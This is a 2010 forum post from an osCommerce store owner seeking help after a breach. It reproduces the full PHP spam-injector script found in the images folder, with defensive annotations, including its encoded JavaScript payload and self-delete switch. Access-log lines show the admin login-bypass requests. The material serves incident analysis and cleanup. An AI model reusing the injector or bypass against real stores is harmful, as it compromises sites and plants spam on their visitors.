Guest Posted August 5, 2010 Posted August 5, 2010 my osc database was got hacked, put some of drugs link to our products, I found the script on images folder call 1dbdor.php
<?php
// Reviewer annotations (defensive reading of the dropped script; code tokens are unchanged,
// only line breaks and comments were added).
//
// What the visible code does: reads keywords from 1dballed.txt, builds 100 spam "product"
// pages, and inserts them into the store's product tables using the shop's own database
// credentials. Each page starts with a base64-encoded <script> block.
//
// Cleanup indicators taken from the code below:
//   - rows in TABLE_PRODUCTS with products_date_added = '1993-01-01 01:00:00'
//   - products_description values containing the decoded <script> block
//   - the files 1dbdor.php, 1dballed.txt and 1dblinks.txt next to this script
//
// NOTE(review): in the access log quoted after the script, the same address POSTs to
// /admin/banner_manager.php/login.php and /admin/categories.php/login.php a few seconds
// before the first GET of /images/1dbdor.php. Admin page paths with "/login.php" appended
// match the widely reported osCommerce 2.2 admin login-check bypass; confirm against the
// installed version. Typical hardening: update the admin login check, protect /admin/
// with HTTP authentication, and disable PHP execution in the images directory.

// Keep running if the client disconnects, with no execution time limit.
ignore_user_abort(1);
set_time_limit(0);

// Paths are relative to this script's directory (the images folder, per the post).
// Presumably these define the DB_* and TABLE_* constants used further down.
include "../includes/configure.php";
include "../includes/database_tables.php";

$keysFile = "1dballed.txt";   // keyword list, one per line (read with file() below)
$linksFile = "1dblinks.txt";  // links to the inserted products, appended by linkToFile()

// Self-removal: a request with d=1 tries to delete this script and both data files.
// The unlink() results are not checked, so 'deleted' is printed even if removal failed.
// NOTE(review): $HTTP_SERVER_VARS is the legacy long-form server array; if it is not
// populated on this PHP build the first unlink() has no valid path and the script would
// stay on disk, which would fit the poster still finding it. Verify.
if ($_REQUEST['d'] == '1') {
    unlink($HTTP_SERVER_VARS['SCRIPT_FILENAME']);
    unlink($keysFile);
    unlink($linksFile);
    die ('deleted');
}

$pageNum = 100;                  // number of product rows to create per run
$linksMinMax = array (2,5);      // min/max links appended to a page
$keysMinMax = array (20,40);     // min/max words per generated page
$keycentMinMax = array (7,10);   // min/max percentage used for keyword density
$stepmaxdif = 5;                 // max random offset applied to the keyword spacing

// Injected into the start of every generated description. The blob begins with
// "<script type='text/javascript'>"; on inspection it appears to hold a character-shifted
// string that a short loop decodes and emits via document.write.
// Decode it offline (not in a browser) to recover any URLs for log searches and blocklists.
$addlink = base64_decode('PHNjcmlwdCB0eXBlPSd0ZXh0L2phdmFzY3JpcHQnPjwhLS0gDQp2YXIgcz0iPWVqdyF0dXptZj4jeGpldWk7Znlxc2Z0dGpwbyllcGR2bmZvdS9jcGV6L3BnZ3RmdVhqZXVpKjwhaWZqaGl1OzMxMTFxeTwhcWJlZWpvaC51cHE7MjExcXk8IW1mZ3U7MXF5PCF1cHE7MXF5PCFzamhpdTsxcXk8IWNiZGxoc3B2b2UuZHBtcHM7ISRnZ2dnZ2c8IXVmeXUuYm1qaG87IWRmb3VmczwhcXB0anVqcG87IWJjdHBtdnVmPCF3anRqY2ptanV6OyF3anRqY21mPCF7LmpvZWZ5OyEzMjYyPCFlanRxbWJ6OyFjbXBkbDwjPz1iIWlzZmc+IyMhcG9EbWpkbD4jeGpvZXB4L21wZGJ1anBvIT4oaXV1cTswMHdmZGp1Zi9qb2dwMGdic25iL3FpcSg8IXNmdXZzbyFnYm10ZjwjPz1qbmghY3BzZWZzPjEhdHNkPiNpdXVxOzAweW5tL3Fiem5mb3VzeS9kcG4wY2Jvb2ZzdDA0NDd5MzkxL2txaCM/Cz1jcz89dHVzcG9oPz8/PyFEbWpkbCF1cCFGb3VmcyE9PT09MHR1c3BvaD89MGI/PTBlanc/IjttPSIiO2ZvcihpPTA7aTxzLmxlbmd0aDtpKyspe2lmKHMuY2hhckNvZGVBdChpKT09Mjgpe20rPScmJ31lbHNlIGlmKHMuY2hhckNvZGVBdChpKT09MjMpe20rPSchJ31lbHNle20rPVN0cmluZy5mcm9tQ2hhckNvZGUocy5jaGFyQ29kZUF0KGkpLTEpfX1kb2N1bWVudC53cml0ZShtKTsvLy0tPjwvc2NyaXB0Pg==');
$lastkdel = "";  // last delimiter emitted by randDel(), shared via global

// Connects with the store's own credentials, so database-level access controls do not
// distinguish these inserts from legitimate shop traffic.
$link = mysql_pconnect(DB_SERVER, DB_SERVER_USERNAME, DB_SERVER_PASSWORD) or die("Could not connect");
mysql_select_db(DB_DATABASE);

$keysArr = file ($keysFile);

// One inserted product per keyword, for the first $pageNum keywords.
for ($i=0;$i<=$pageNum-1;$i++) {
    $key = $keysArr[$i];
    //foreach ($keysArr as $key)
    //{
    $page = '';
    $key = ucfirst(trim($key));
    $page = $addlink;          // injected script first
    $page .= pageGen ($key);   // then generated keyword text
    $page .= AddLinks ();      // then links to previously inserted products, if any
    insertDB ($key , $page);
    //}
}
// Marker string returned to the requester once the run has finished.
echo '1DBDOR';

// Builds the keyword-stuffed body for one page: an <h1> with the keyword followed by a
// random-length sequence of words, mixing the page keyword (wrapped in a random tag)
// with random other keywords from the list.
function pageGen ($key) {
    global $keysMinMax , $keycentMinMax , $stepmaxdif , $keysArr;
    $i=1;
    $stepi = 1;
    $maxslov = rand ($keysMinMax[0],$keysMinMax[1]);       // total words on this page
    $percent = rand ($keycentMinMax[0],$keycentMinMax[1]); // target keyword percentage
    // The (int) cast binds to the first operand only, so both results can be fractional.
    $mk = (int)($percent*$maxslov)/($percent+100) ;
    $srstep = (int)$maxslov/$mk ;
    $addtopage .= '<h1>'.$key.'</h1>';
    while ($i <= $maxslov) {
        // Alternate between adding and subtracting a random offset from the base spacing.
        if ($stepi % 2 != 0) {
            $stepdif = rand(0,$stepmaxdif);
            $step = $srstep + $stepdif;
        } else {
            $step = $srstep - $stepdif;
        }
        if ($i % $step == 0) {
            // Position for the page keyword: wrap it in a random tag.
            $tagkey = randtag($key);
            $addtopage .= randDel($tagkey);
            $i++;
            $stepi++;
        } else {
            // Filler: a random other keyword from the list.
            $otherkey = rand(0, count($keysArr)-1);
            $addtopage .= randDel(trim($keysArr[$otherkey]));
            $i++;
        }
    }
    return $addtopage;
}

// Appends a randomly chosen delimiter to $key; capitalises $key when the previous
// delimiter ended a sentence or line.
function randDel ($key) {
    global $lastkdel;
    $dArr = array (' ' , ' ' , ', ' , '. ' , ' - ' , ': ' , '<br>', '<br><br>');
    $d = array_rand ($dArr);
    if ($lastkdel == '. ' || $lastkdel == '<br>' || $lastkdel == '<br><br>') {
        $res = ucfirst($key) . $dArr[$d];
    } else {
        $res = $key.$dArr[$d];
    }
    $lastkdel = $dArr[$d];
    return $res;
}

// Wraps $string in one randomly chosen emphasis/quote tag pair.
function randtag ($string) {
    $st = array ( '<b>' , '<strong>' , '<i>' , '<em>' , '<blockquote>');
    $et = array ('</b>', '</strong>', '</i>', '</em>' , '</blockquote>');
    $r = rand (0 , count($st)-1);
    return $st[$r] . $string . $et[$r];
}

// Returns a short run of random links from the links file, joined by one random
// delimiter. Returns nothing when the file is missing or holds no more than
// $linksMinMax[1]*2 lines.
function AddLinks () {
    global $linksFile , $linksMinMax;
    $addlinks = '';
    $linksDel = array (', ' , ' | ' , '<br>');
    $ldc = count($linksDel);
    if (file_exists($linksFile)) {
        $links = file ($linksFile);
        $c = count ($links);
        if ($c > $linksMinMax[1]*2) {
            $lmax = rand ($linksMinMax[0],$linksMinMax[1]);
            $ldi = rand (0 , $ldc-1);
            for ($i=0 ; $i < $lmax ; $i++ ) {
                $addlinks .= ($i == 0) ? ( trim($links[rand(0,$c-1)]) ) : ( $linksDel[$ldi] . trim($links[rand(0,$c-1)]) );
            }
            return $addlinks;
        } else {
            return ;
        }
    } else {
        return ;
    }
}

// Inserts one spam product: a TABLE_PRODUCTS row with a fixed 1993 date and status '1',
// then a TABLE_PRODUCTS_DESCRIPTION row carrying the keyword and generated page.
// The fixed date is a convenient selector when identifying rows to remove.
function insertDB ( $key , $descr ) {
    $key = mysql_escape_string($key);
    $descr = mysql_escape_string($descr);
    $r = mysql_query ("INSERT INTO ".TABLE_PRODUCTS." (products_date_added,products_status) VALUES ('1993-01-01 01:00:00','1')" );
    $r = mysql_query ("INSERT INTO ".TABLE_PRODUCTS_DESCRIPTION." (products_name,products_description) VALUES ('".$key."','".$descr."')" );
    $r = mysql_query ("select last_insert_id()");
    $pid = mysql_result ($r, 0, 0);
    // PHP function names are case-insensitive, so this calls linkToFile() below.
    LinkToFile ($pid , $key);
}

// Appends an anchor pointing at the new product's product_info.php page to the links
// file, which AddLinks() later reads to cross-link the inserted pages.
function linkToFile ($id , $key) {
    global $linksFile;
    $link = '<a href="' . HTTP_SERVER . DIR_WS_HTTP_CATALOG .'product_info.php?products_id=' . $id . '">' . $key . '</a>';
    $fp = fopen ($linksFile , "a");
    fputs ($fp , $link."\r\n");
    fclose ($fp);
}
?>
I can't found how can they login my admin, and the log
188.120.234.41 - - [05/Aug/2010:06:02:41 +0800] "GET /images/1dbdor.php HTTP/1.0" 200 181 "-" "-"
188.120.234.41 - - [05/Aug/2010:06:02:51 +0800] "GET /images/1dblinks.txt HTTP/1.0" 200 9253 "-" "-"
188.120.234.41 - - [05/Aug/2010:06:02:52 +0800] "GET /images/1dbdor.php?d=1 HTTP/1.0" 200 182 "-" "-"
188.120.234.41 - - [05/Aug/2010:06:02:28 +0800] "POST /admin/banner_manager.php/login.php?action=insert HTTP/1.1" 200 18758 "-" "-"
188.120.234.41 - - [05/Aug/2010:06:02:33 +0800] "POST /admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 200 16846 "-" "-"
188.120.234.41 - - [05/Aug/2010:06:02:37 +0800] "POST /admin/banner_manager.php/login.php?action=insert HTTP/1.1" 200 18758 "-" "-"
188.120.234.41 - - [05/Aug/2010:06:02:39 +0800] "POST /admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 200 16846 "-" "-"
anyone can advise? Regards Dan